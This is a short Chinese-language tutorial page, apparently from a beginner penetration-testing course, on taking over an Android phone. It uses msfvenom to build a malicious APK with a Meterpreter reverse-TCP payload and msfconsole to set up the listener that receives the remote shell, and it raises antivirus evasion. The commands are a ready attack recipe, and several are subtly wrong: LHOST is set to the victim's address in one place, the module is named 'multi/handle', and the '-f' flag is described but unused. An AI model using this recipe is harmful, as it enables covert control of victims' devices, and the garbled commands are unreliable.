1.1. 如何渗透攻击Android

原理和渗透攻击Windows PC很相似,就是我们在设置Payload是需要注意类型和输出的值

1.2. 测试环境

攻击者:Kali IP地址:192.168.43.126

victim:Android IP地址:192.168.43.188

1.3. 使用msfvenom生成Payload

我们可以使用msfvenom来生成Payload,这个工具可以很方便的生成我们需要的Payload文件,加上命令不难理解就成了初学者比较好的选择

那我们使用什么命令生成Payload呢?

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.188 LPORT=4444 R > android.apk

1.3.1. 参数讲解

-p 参数指的是Payload的类型

-LHOST 参数指定的是本地Kali主机的IP地址,就是将TCP会话返回给谁

-LPORT 参数指定的是返回TCP会话使用的本地端口

-f 参数指定的是生成的文件类型

现在我们需要思考一个问题,生成的Payload文件会不会报毒呢?

1.4. 设置监听器

我们使用msfconsole来设置监听器,需要注意的是设置监听器参数的时候需要和生成Payload文件的参数一样,不然不能返回TCP会话

use exploit/multi/handle
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.126
set LPORT 4444

设置完监听器的参数之后,我们使用命令来查看一下监听器的信息

show options

一样查看设置,都设置正确的话,就可以使用命令开启监听器,如果发现那一句没有设置正确就重新设置那个参数

exploit

如果帮助到你了,希望可以得到你的打赏,谢谢B站频道传送门

powered by GitbookFile Modify: 2019-04-30 11:27:41

results matching ""

    No results matching ""